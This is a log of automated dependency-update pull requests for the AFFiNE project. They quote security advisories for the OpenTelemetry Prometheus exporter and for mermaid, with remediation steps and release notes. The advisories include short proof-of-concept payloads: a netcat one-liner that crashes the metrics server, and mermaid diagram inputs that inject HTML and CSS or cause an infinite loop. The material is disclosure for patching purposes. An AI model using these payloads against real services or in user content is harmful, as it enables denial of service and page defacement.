apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
  * you use `@opentelemetry/auto-instrumentations-node` via `--require
@opentelemetry/auto-instrumentations-node/register`/`--import
@opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@opentelemetry/exporter-prometheus)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:21:10 +08:00
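The crash and the fix described in the exporter advisory above, reduced to the URL-parsing step. This is an added example, not code from opentelemetry-js: `BASE_URL`, the `/metrics` path, the handler names and the fake response object are assumptions made for the sketch.

```javascript
// Assumed base URL; the advisory only says request.url is resolved against
// the exporter's own base URL (default port 9464).
const BASE_URL = 'http://localhost:9464/';
const METRICS_PATH = '/metrics'; // assumed endpoint path for this sketch

// Hypothetical stand-in for the serialized metrics body (constructed sample).
function renderMetrics() {
  return '# TYPE demo_requests_total counter\ndemo_requests_total 1\n';
}

// Shared routing once a pathname has been obtained.
function route(pathname, response) {
  if (pathname === METRICS_PATH) {
    response.statusCode = 200;
    response.setHeader('content-type', 'text/plain');
    response.end(renderMetrics());
  } else {
    response.statusCode = 404;
    response.end();
  }
}

// Pre-fix pattern: URL parsing is unguarded. Inside a real http.Server
// request listener the thrown TypeError is an uncaught exception, which
// terminates the Node.js process.
function unguardedHandler(request, response) {
  const { pathname } = new URL(request.url, BASE_URL);
  route(pathname, response);
}

// Post-fix pattern: a parse failure is answered with HTTP 400 and the
// listener returns normally, so one bad request cannot stop the process.
function guardedHandler(request, response) {
  let pathname;
  try {
    pathname = new URL(request.url, BASE_URL).pathname;
  } catch (err) {
    response.statusCode = 400;
    response.setHeader('content-type', 'text/plain');
    response.end('Bad Request\n');
    return;
  }
  route(pathname, response);
}

// Minimal response double so the handlers can be exercised without a socket.
function fakeResponse() {
  return {
    statusCode: 0,
    headers: {},
    body: '',
    setHeader(name, value) { this.headers[name.toLowerCase()] = value; },
    end(chunk = '') { this.body += chunk; },
  };
}

// Runs one handler against one request-target and reports whether the
// exception escaped the handler (the condition that would kill a server).
function exercise(handler, requestTarget) {
  const response = fakeResponse();
  try {
    handler({ method: 'GET', url: requestTarget }, response);
    return { crashed: false, error: null, status: response.statusCode };
  } catch (err) {
    return { crashed: true, error: err.name, status: null };
  }
}

// Constructed request-targets: origin-form, an unknown path, the malformed
// absolute-form value named in the advisory, and a valid absolute-form URI.
const SAMPLE_TARGETS = [
  '/metrics',
  '/healthz',
  'http://',
  'http://localhost:9464/metrics',
];

for (const target of SAMPLE_TARGETS) {
  console.log(
    JSON.stringify(target),
    'unguarded:', JSON.stringify(exercise(unguardedHandler, target)),
    'guarded:', JSON.stringify(exercise(guardedHandler, target)),
  );
}
```

The same regression check is worth keeping in a service's own test suite for any HTTP listener that passes `request.url` to `new URL`, since absolute-form request-targets reach the handler unvalidated.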
renovate[bot] 6b720206c6 chore: bump up mermaid version to v11.15.0 [SECURITY] (#14946)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`11.13.0`
→ `11.15.0`](https://renovatebot.com/diffs/npm/mermaid/11.13.0/11.15.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/mermaid/11.15.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/mermaid/11.13.0/11.15.0?slim=true)
|

---

### Mermaid: Improper sanitization of `classDef` in state diagrams leads
to HTML injection
[CVE-2026-41149](https://nvd.nist.gov/vuln/detail/CVE-2026-41149) /
[GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

<details>
<summary>More information</summary>

#### Details
##### Impact

Under the default configuration, Mermaid state diagram's `classDef`
allows DOM injection that escapes the SVG, although `<script>` tags are
removed, preventing XSS.

##### Proof-of-concept

```
stateDiagram-v2
  classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b
  [*] --> A:::xss
```

##### Patches

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3))

##### Workarounds

If you cannot update to a patched version, setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Credits

Thanks to @zsxsoft from @KeenSecurityLab for reporting
this vulnerability.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr)
-
[https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
-
[https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://redirect.github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-ghcm-xqfw-q4vr](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-ghcm-xqfw-q4vr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of `classDefs` in diagrams leads to
CSS injection
[CVE-2026-41148](https://nvd.nist.gov/vuln/detail/CVE-2026-41148) /
[GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

<details>
<summary>More information</summary>

#### Details
##### Details

The state diagram and any other diagram type that routes user-controlled
style strings through createCssStyles parser for Mermaid v11.14.0 and
earlier captures `classDef` values with an unrestricted regex:

```jison
// packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83
<CLASSDEFID>[^\n]*   { this.popState(); return 'CLASSDEF_STYLEOPTS' }
```

The value passes unsanitized through `addStyleClass()` ->
`createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in
the value closes the generated CSS selector, and everything after
becomes a new CSS rule on the page.

##### PoC

```
stateDiagram-v2 
      classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")}
```

Live demo:

<https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU>

##### Patches

This has been patched in:

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102))

##### Workarounds

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will prevent this, by rendering the mermaid diagram in a sandboxed
`<iframe>`.

##### Impact

Enables page defacement, user tracking via `url()` callbacks, and DOM
attribute exfiltration via CSS `:has()` selectors.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r)
-
[https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102](https://redirect.github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)
-
[https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://mermaid.js.org/config/schema-docs/config.html#securitylevel](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
-
[https://github.com/advisories/GHSA-xcj9-5m2h-648r](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-xcj9-5m2h-648r)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid: Improper sanitization of configuration leads to CSS
injection
[CVE-2026-41159](https://nvd.nist.gov/vuln/detail/CVE-2026-41159) /
[GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid's default configuration allows injecting CSS that applies
outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and
`altFontFamily` configuration options.

Live demo:
[mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg)

Example code:

```
%%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%%
flowchart LR
    A --> B
```

The injected CSS exploits stylis's `&` (scope reference) handling.
`:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles
to all page elements. Global at-rules (`@font-face`, `@keyframes`,
`@counter-style`) are also injectable as stylis hoists them to top
level.

This allows page defacement and DOM attribute exfiltration via CSS
`:has()` selectors.

##### Patches

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76))

##### Workarounds

If you can't upgrade mermaid, you can set the
[`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure)
config value in the mermaid config to avoid allowing diagrams to modify
`fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`.

Setting [`"securityLevel":
"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel)
will also prevent this.

##### Credits

Reported by @zsxsoft on behalf of @KeenSecurityLab

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p)
-
[https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
-
[https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Mermaid Gantt Charts are vulnerable to an Infinite Loop DoS
[CVE-2026-41150](https://nvd.nist.gov/vuln/detail/CVE-2026-41150) /
[GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

<details>
<summary>More information</summary>

#### Details
##### Impact

Mermaid v11.14.0 and earlier are vulnerable to a denial-of-service
attack when rendering gantt charts, if they use the [`excludes`
attribute](https://mermaid.js.org/syntax/gantt.html?#excludes) to
exclude all dates.

Example:

```
gantt
  excludes monday,tuesday,wednesday,thursday,friday,saturday,sunday
  DoS :2025-01-01, 1d
```

`mermaid.parse` is unaffected, unless you then call the
`ganttDb.getTasks()` (which is called when rendering a diagram).

##### Patches

This has been patched in:

-
[v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
(see
[faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e))
-
[v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
(see
[a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6))

##### Workarounds

There are no workarounds available without updating to a newer version
of mermaid.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L`

#### References
-
[https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh)
-
[https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6)
-
[https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
-
[https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)
-
[https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6)
-
[https://github.com/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>mermaid-js/mermaid (mermaid)</summary>

###
[`v11.15.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.14.0...mermaid@11.15.0)

##### Minor Changes

-
[#7174](https://redirect.github.com/mermaid-js/mermaid/pull/7174)
[`0aca217`](https://redirect.github.com/mermaid-js/mermaid/commit/0aca21739c0d1fcaaa206e04a6cd574ebc415483)
Thanks
[@milesspencer35](https://redirect.github.com/milesspencer35)! -
feat(sequence): Add support for decimal start and increment values in
the `autonumber` directive

-
[#7512](https://redirect.github.com/mermaid-js/mermaid/pull/7512)
[`8e17492`](https://redirect.github.com/mermaid-js/mermaid/commit/8e17492f7365ba50896382feb69a23efd9d8a22d)
Thanks [@aruncveli](https://redirect.github.com/aruncveli)! -
feat(flowchart): add datastore shape

In Data flow diagrams, a datastore/warehouse/file/database is used to
represent data persistence. It is denoted by a rectangle with only top
and bottom borders, and can be used in flowcharts with `A@{ shape:
datastore, label: "Datastore" }`.

-
[#6440](https://redirect.github.com/mermaid-js/mermaid/pull/6440)
[`9ad8dde`](https://redirect.github.com/mermaid-js/mermaid/commit/9ad8dde6d049adde85d8ed2d476c09b5820f3f4b)
Thanks [@yordis](https://redirect.github.com/yordis),
[@lgazo](https://redirect.github.com/lgazo)! - feat: add Event
Modeling diagram

-
[#7707](https://redirect.github.com/mermaid-js/mermaid/pull/7707)
[`27db774`](https://redirect.github.com/mermaid-js/mermaid/commit/27db774627be1cee881961dfd0d2cb21cd01b79d)
Thanks [@txmxthy](https://redirect.github.com/txmxthy)! -
feat(architecture): expose four fcose layout knobs for
`architecture-beta` diagrams (`nodeSeparation`,
`idealEdgeLengthMultiplier`, `edgeElasticity`, `numIter`) so authors can
tune layout density and spread overlapping siblings without changing
diagram source

-
[#7604](https://redirect.github.com/mermaid-js/mermaid/pull/7604)
[`bf9502f`](https://redirect.github.com/mermaid-js/mermaid/commit/bf9502fb6012a4b724679b401ac928f5ee55161c)
Thanks [@M-a-c](https://redirect.github.com/M-a-c)! -
feat(class): add nested namespace support for class diagrams via dot
notation and syntactic nesting

If you have namespaces in class diagrams that use `.`s already and want
to render them without nesting (≤v11.14.0 behaviour), you can set
`class.hierarchicalNamespaces=false` in your mermaid config:

  ```yaml
  config:
    class:
      hierarchicalNamespaces: false
  ```

-
[#7272](https://redirect.github.com/mermaid-js/mermaid/pull/7272)
[`88cdd3d`](https://redirect.github.com/mermaid-js/mermaid/commit/88cdd3dc0aab9577174561b04e14760c565a232b)
Thanks [@xinbenlv](https://redirect.github.com/xinbenlv)! -
feat(sankey): add outlined label style, configurable
nodeWidth/nodePadding, and custom node colors

##### Patch Changes

-
[#7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`e9b0f34`](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)
Thanks
[@ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: prevent unbalanced CSS styles in classDefs

-
[#7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`37ff937`](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)
Thanks
[@ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: create CSS styles using the CSSOM

  This removes some invalid CSS and normalizes some CSS formatting.

-
[#7508](https://redirect.github.com/mermaid-js/mermaid/pull/7508)
[`bfe60cc`](https://redirect.github.com/mermaid-js/mermaid/commit/bfe60cc67b9a6dec64f9161f58e4d24a06c42b65)
Thanks [@biiab](https://redirect.github.com/biiab)! -
fix(stateDiagram): `end note` now only closes a note when used on a new
line

-
[#7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`faafb5d`](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)
Thanks
[@ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix(gantt): add iteration limit for `excludes` field

-
[#7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`65f8be2`](https://redirect.github.com/mermaid-js/mermaid/commit/65f8be2a42faf869b811469571983cba7eeeca99)
Thanks
[@ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: disallow some CSS at-rules in custom CSS

-
[#7726](https://redirect.github.com/mermaid-js/mermaid/pull/7726)
[`1502f32`](https://redirect.github.com/mermaid-js/mermaid/commit/1502f32f3c5fb944925b0c527fbbde3c4f041824)
Thanks [@aloisklink](https://redirect.github.com/aloisklink)! -
fix(wardley): fix unnecessary sanitization of text

-
[#7578](https://redirect.github.com/mermaid-js/mermaid/pull/7578)
[`1f98db8`](https://redirect.github.com/mermaid-js/mermaid/commit/1f98db8e326299ac97a2fa60abfd509d8f5f16e2)
Thanks [@Gaston202](https://redirect.github.com/Gaston202)! -
fix(class): self-referential class multiplicity labels no longer
rendered multiple times

Fixes
[#7560](https://redirect.github.com/mermaid-js/mermaid/issues/7560).
Resolves an issue where cardinality labels on self-referential class
relationships were rendered three times due to edge splitting in the
dagre layout. The fix ensures that each sub-edge only carries its
relevant label positions.

-
[#7592](https://redirect.github.com/mermaid-js/mermaid/pull/7592)
[`2343e38`](https://redirect.github.com/mermaid-js/mermaid/commit/2343e38498a3b31f8ce5e79f1f009e0b56fbe086)
Thanks [@knsv-bot](https://redirect.github.com/knsv-bot)! -
fix(sequence): add background box behind alt/else section title labels
in sequence diagrams

-
[#7589](https://redirect.github.com/mermaid-js/mermaid/pull/7589)
[`7fb9509`](https://redirect.github.com/mermaid-js/mermaid/commit/7fb9509b8b5cb1dc48519dc60cf6cdc6afba0462)
Thanks [@NYCU-Chung](https://redirect.github.com/NYCU-Chung)! -
fix(block): prevent column widths from shrinking when mixing different
column spans

-
[#7632](https://redirect.github.com/mermaid-js/mermaid/pull/7632)
[`3f9e0f1`](https://redirect.github.com/mermaid-js/mermaid/commit/3f9e0f15bedc1e2c71ddb6b34192d1a21124cfc2)
Thanks [@ekiauhce](https://redirect.github.com/ekiauhce)! -
fix(sequence): correct messageAlign label position for right-to-left
arrows in sequence diagrams

-
[#7642](https://redirect.github.com/mermaid-js/mermaid/pull/7642)
[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445)
Thanks [@tractorjuice](https://redirect.github.com/tractorjuice)!
- fix(wardley): allow hyphens in unquoted component names

Multi-word names containing hyphens — e.g. `real-time processing`,
`end-user`, `on-call engineer` — now parse without quoting, bringing the
grammar in line with the OnlineWardleyMaps (OWM) convention. `A->B`
(no-space arrow) still tokenises correctly.

-
[#7523](https://redirect.github.com/mermaid-js/mermaid/pull/7523)
[`5144ed4`](https://redirect.github.com/mermaid-js/mermaid/commit/5144ed4b138ae0f4836bab4c163c575e0a767dd3)
Thanks [@darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Arrow blocks in block-beta diagrams not spanning the
specified number of columns when using `:n` syntax.

-
[#7262](https://redirect.github.com/mermaid-js/mermaid/pull/7262)
[`13d9bfa`](https://redirect.github.com/mermaid-js/mermaid/commit/13d9bfa4748e845a9eec7d6265ba496d2278f26e)
Thanks [@darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Ensure block diagram hexagon blocks respect column
spanning syntax

-
[#7684](https://redirect.github.com/mermaid-js/mermaid/pull/7684)
[`e14bb88`](https://redirect.github.com/mermaid-js/mermaid/commit/e14bb88bdb940124cdb0a107025653bf93745c99)
Thanks [@aloisklink](https://redirect.github.com/aloisklink)! -
fix: loosen `uuid` dependency range to allow v14

  Mermaid does not use any of the vulnerable code in CVE-2026-41907,
  but this allows users to silence any `npm audit` alerts on it.

-
[#7633](https://redirect.github.com/mermaid-js/mermaid/pull/7633)
[`9217c0d`](https://redirect.github.com/mermaid-js/mermaid/commit/9217c0d8b221b423af80e420b7adae901acf6c8c)
Thanks [@Felix-Garci](https://redirect.github.com/Felix-Garci)! -
